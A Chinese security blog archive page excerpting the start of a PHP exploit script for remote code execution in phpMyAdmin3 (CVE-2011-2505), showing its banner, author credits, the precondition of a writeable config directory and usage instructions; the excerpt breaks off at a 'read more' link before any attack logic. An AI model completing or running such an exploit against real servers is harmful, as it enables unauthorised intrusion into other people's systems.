存档

文章标签 ‘phpmyadmin3’

phpMyAdmin3 remote code execute exploit [Not jilei(chicken\’s ribs)]

2011年12月26日 3 条评论
  1. #!/usr/bin/php
  2. <?php
  3. print_r(‘
  4. +—————————————————————————+
  5. pma3 – phpMyAdmin3 remote code execute exploit [Not jilei(chicken\’s ribs)]
  6. by oldjun(www.oldjun.com)
  7. welcome to www.t00ls.net
  8. mail: oldjun@gmail.com
  9. Assigned CVE id: CVE-2011-2505
  10. +—————————————————————————+
  11. ‘);
  12. /**
  13. * working when the directory:”config” exists and is writeable.
  14. **/
  15. if ($argc < 3) {
  16. print_r(‘
  17. +—————————————————————————+
  18. Usage: php ‘.$argv[0].’ host path
  19. host: target server (ip/hostname)
  20. path: path to pma3
  21. Example:
  22. php ‘.$argv[0].’ localhost /pma/
  23. +—————————————————————————+ 阅读全文…
分类: 应用安全 标签:
普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress